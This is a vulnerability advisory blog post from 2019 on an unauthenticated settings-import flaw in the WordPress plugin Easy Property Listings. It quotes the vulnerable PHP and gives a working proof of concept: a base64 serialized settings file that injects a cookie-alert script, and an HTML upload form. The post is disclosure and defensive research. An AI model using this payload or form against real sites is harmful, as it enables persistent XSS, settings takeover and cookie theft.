19 Jul 2019

A Hacker Looks to be Probing for the WordPress Plugin Easy Property Listings, These Vulnerabilities Might Be Why

Yesterday we had what looks to be a hacker probing for usage of the plugin Easy Property Listings through requests for these two files:

/wp-content/plugins/easy-property-listings/license.txt

/wp-content/plugins/easy-property-listings/readme.txt

We didn’t already have any vulnerabilities listed in the data set of WordPress plugin vulnerabilities for our service that should explain why a hacker might be targeting that, so we started looking to see if there was something we should be warning our customers about. We immediately found that numerous security issues with the plugin, but one vulnerability connected to that that stood out right away and is the kind of thing hackers have been known to exploit in other plugins, is a persistent cross-site scripting (XSS) vulnerability caused by very insecure code that handles importing settings for the plugin. That is the kind of thing that would have been caught if a security review of the plugin had been done since it involves multiple issues that should be checked for during a review.

Details

The plugin registers the function epl_handle_tools_form() to be accessible during “admin_init”, which means it can run even when the request comes from someone not logged in to WordPress:

448
add_action('admin_init', 'epl_handle_tools_form' );

The first part of that function, which is located in the file /lib/includes/admin/admin-functions.php, checks for the existence of several user inputs, but doesn’t do any security checks:

398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
function epl_handle_tools_form() {
 
    if( !isset($_GET['page']) || $_GET['page'] != 'epl-tools' || !isset($_REQUEST['epl_tools_submit'])  )
        return;
 
 
    if( !isset($_REQUEST['action']) ){
    	return;
    }
 
    $action  = $_REQUEST['action'];
 
    // sanitize post array
    $post_data	= filter_input_array(INPUT_POST, FILTER_SANITIZE_STRING);
 
    switch($action) {

One of the pieces of code that can run in the switch statement at the end of that code overwrites the plugin’s settings with contents from a file sent with the request:

431
432
433
434
435
436
437
438
439
440
441
442
        case 'import':
        $uploadedfile 	= $_FILES['epl_import'];
        $upload_overrides = array( 'test_form' => false );
		$movefile = wp_handle_upload( $uploadedfile, $upload_overrides );
 
		if ( $movefile && ! isset( $movefile['error'] ) ) {
			$imported_data = file_get_contents($movefile['url']);
			$imported_data = epl_unserialize( $imported_data );
			$options_backup = get_option('epl_settings');
			update_option('epl_settings_backup',$options_backup);
			$status = update_option('epl_settings',$imported_data);
		}

The function epl_unserialize() that the contents of the file are sent to unserializes the value, so PHP object injection can occur in this code:

319
320
321
function epl_unserialize($data) {
	return unserialize(base64_decode($data));
}

If malicious JavaScript code is included in the new values of settings it can be output on the plugin’s settings, as shown with the proof of concept below, and likely elsewhere.

Full Disclosure

Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then leaving a message about that for the developer through the WordPress Support Forum. You can notify the developer of this issue on the forum as well. Hopefully the moderators will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon). You would think they would have already done that, but considering that they believe that having plugins, which have millions installs, remain in the Plugin Directory despite them knowing they are vulnerable is “appropriate action”, something is very amiss with them (which is even more reason the moderation needs to be cleaned up).

Update: To clear up the confusion where developers claim we hadn’t tried to notify them through the Support Forum (while at the same time moderators are complaining about us doing just that), here is the message we left for this vulnerability:

Is It Fixed?

If you are reading this post down the road the best way to find out if this vulnerability or other WordPress plugin vulnerabilities in plugins you use have been fixed is to sign up for our service, since what we uniquely do when it comes to that type of data is to test to see if vulnerabilities have really been fixed. Relying on the developer’s information, can lead you astray, as we often find that they believe they have fixed vulnerabilities, but have failed to do that.

Proof of Concept

The following proof concept will cause an alert box with any available cookies to be shown when accessing the page /wp-admin/admin.php?page=epl-settings.

Upload a .txt file with the following content using the form below:

YTo2MDp7czo4OiJjdXJyZW5jeSI7czozOiJBVUQiO3M6MTc6ImN1cnJlbmN5X3Bvc2l0aW9uIjtzOjY6ImJlZm9yZSI7czoyODoiY3VycmVuY3lfdGhvdXNhbmRzX3NlcGFyYXRvciI7czoxOiIsIjtzOjI2OiJjdXJyZW5jeV9kZWNpbWFsX3NlcGFyYXRvciI7czoxOiIuIjtzOjE1OiJhZG1pbl91bmlxdWVfaWQiO2k6MDtzOjU6ImRlYnVnIjtpOjA7czoxMjoiZGlzcGxheV9ib25kIjtpOjA7czoyMjoiZGlzcGxheV9zaW5nbGVfZ2FsbGVyeSI7aToxO3M6MTc6ImRpc3BsYXlfZ2FsbGVyeV9uIjtpOjQ7czoyMzoiZGlzcGxheV9mZWF0dXJlX2NvbHVtbnMiO2k6MjtzOjIyOiJkaXNwbGF5X2V4Y2VycHRfbGVuZ3RoIjtpOjEwO3M6MjU6ImRpc3BsYXlfYXJjaGl2ZV92aWV3X3R5cGUiO3M6NDoibGlzdCI7czoyMDoidXNlX2ZhbmN5X25hdmlnYXRpb24iO2k6MDtzOjEwOiJsYWJlbF9ib25kIjtzOjQ6IkJvbmQiO3M6MTQ6ImxhYmVsX2xvY2F0aW9uIjtzOjY6IlN1YnVyYiI7czoxMjoibGFiZWxfc3VidXJiIjtzOjQyOiIiPjxzY3JpcHQ+YWxlcnQoZG9jdW1lbnQuY29va2llKTs8L3NjcmlwdD4iO3M6MTA6ImxhYmVsX2NpdHkiO3M6NDoiQ2l0eSI7czoxMToibGFiZWxfc3RhdGUiO3M6NToiU3RhdGUiO3M6MTQ6ImxhYmVsX3Bvc3Rjb2RlIjtzOjk6IlBvc3QgQ29kZSI7czoxNToibGFiZWxfaG9tZV9vcGVuIjtzOjk6IkhvbWUgT3BlbiI7czo5OiJsYWJlbF9wb2EiO3M6MzoiUE9BIjtzOjk6ImxhYmVsX25ldyI7czozOiJOZXciO3M6MTc6ImxhYmVsX3VuZGVyX29mZmVyIjtzOjExOiJVbmRlciBPZmZlciI7czoxMjoibGFiZWxfbGVhc2VkIjtzOjY6IkxlYXNlZCI7czoxMDoibGFiZWxfc29sZCI7czo0OiJTb2xkIjtzOjE2OiJ3aWRnZXRfbGFiZWxfYWxsIjtzOjM6IkFsbCI7czoyMToid2lkZ2V0X2xhYmVsX3Byb3BlcnR5IjtzOjM6IkJ1eSI7czoxNzoid2lkZ2V0X2xhYmVsX2xhbmQiO3M6NDoiTGFuZCI7czoxOToid2lkZ2V0X2xhYmVsX3JlbnRhbCI7czo0OiJSZW50IjtzOjE4OiJ3aWRnZXRfbGFiZWxfcnVyYWwiO3M6NToiUnVyYWwiO3M6MjE6IndpZGdldF9sYWJlbF9idXNpbmVzcyI7czo4OiJCdXNpbmVzcyI7czoyMzoid2lkZ2V0X2xhYmVsX2NvbW1lcmNpYWwiO3M6MTA6IkNvbW1lcmNpYWwiO3M6Mjg6IndpZGdldF9sYWJlbF9jb21tZXJjaWFsX2xhbmQiO3M6MTU6IkNvbW1lcmNpYWwgTGFuZCI7czoyNToiZXBsX21heF9ncmFwaF9zYWxlc19wcmljZSI7aToyMDAwMDAwO3M6MjQ6ImVwbF9tYXhfZ3JhcGhfcmVudF9wcmljZSI7aToyMDAwO3M6MTc6InN0aWNrZXJfbmV3X3JhbmdlIjtpOjc7czoyMDoiZXBsX2FkbWluX3RodW1iX3NpemUiO3M6MTY6ImFkbWluLWxpc3QtdGh1bWIiO3M6MjE6ImVwbF9lbmFibGVfY2l0eV9maWVsZCI7czoyOiJubyI7czoyNDoiZXBsX2VuYWJsZV9jb3VudHJ5X2ZpZWxkIjtzOjI6Im5vIjtzOjE3OiJlcGxfZmVlbGluZ19sdWNreSI7czozOiJvZmYiO3M6MzA6ImVwbF9sdWNreV9kaXNhYmxlX3NpbmdsZV90aHVtYiI7czozOiJvZmYiO3M6MzY6ImVwbF9sdWNreV9kaXNhYmxlX3RoZW1lX3NpbmdsZV90aHVtYiI7czozOiJvZmYiO3M6MzE6ImVwbF9sdWNreV9kaXNhYmxlX2FyY2hpdmVfdGh1bWIiO3M6Mzoib2ZmIjtzOjM1OiJlcGxfbHVja3lfZGlzYWJsZV9lcGxfYXJjaGl2ZV90aHVtYiI7czozOiJvZmYiO3M6MTY6ImVwbF91c2VfY29yZV9jc3MiO3M6Mzoib2ZmIjtzOjE0OiJlcGxfY3NzX2xlZ2FjeSI7czozOiJvZmYiO3M6MTY6ImVwbF9jc3NfZW5oYW5jZWQiO3M6Mjoib24iO3M6MTk6InVuaW5zdGFsbF9vbl9kZWxldGUiO2k6MDtzOjIyOiJpbnNwZWN0aW9uX2RhdGVfZm9ybWF0IjtzOjc6ImwsIGRTIEYiO3M6MjI6Imluc3BlY3Rpb25fdGltZV9mb3JtYXQiO3M6NToiaDppIGEiO3M6Mjk6ImN1c3RvbV9pbnNwZWN0aW9uX2RhdGVfZm9ybWF0IjtzOjc6ImwsIGRTIEYiO3M6Mjk6ImN1c3RvbV9pbnNwZWN0aW9uX3RpbWVfZm9ybWF0IjtzOjU6Img6aSBhIjtzOjE1OiJlcGxfdmlkZW9fd2lkdGgiO2k6NjAwO3M6MTg6Im1pbl9jb250YWN0X2FjY2VzcyI7czo4OiJsZXZlbF8xMCI7czoxODoibWluX3JlcG9ydHNfYWNjZXNzIjtzOjg6ImxldmVsXzEwIjtzOjE5OiJhY3RpdmF0ZV9wb3N0X3R5cGVzIjthOjE6e2k6MDtzOjg6InByb3BlcnR5Ijt9czoxOToiZXBsX2RlZmF1bHRfY291bnRyeSI7czo5OiJBdXN0cmFsaWEiO3M6MjI6ImVwbF9pY29uc19zdmdfbGlzdGluZ3MiO3M6Mjoib24iO3M6MjA6ImVwbF9pY29uc19zdmdfYXV0aG9yIjtzOjI6Im9uIjtzOjE1OiJlcGxfcGx1Z2luX21vZGUiO3M6MTA6InByb2R1Y3Rpb24iO30=

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-post.php?page=epl-tools&action=import" method="POST" enctype="multipart/form-data">
<input type="file" name="epl_import" />
<input type="submit" name="epl_tools_submit" value="Submit" />
</form>
</body>
</html>

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.

One thought on “A Hacker Looks to be Probing for the WordPress Plugin Easy Property Listings, These Vulnerabilities Might Be Why

  1. We have put extensive work into resolving all security issues in the Easy Property Listings plugin beyond just the above security issue.

    Working day and night with the help of the WordPress.org tea directing us to the phpcs tool to assist in applying WordPress code standards Easy Property Listings 3.4 is out and not secure.

    Tell you the truth, wich we knew about the phpcs tool before, so we have learned hell of a lot fro this experience and thankfully have resolved the issues.

Leave a Reply

Your email address will not be published.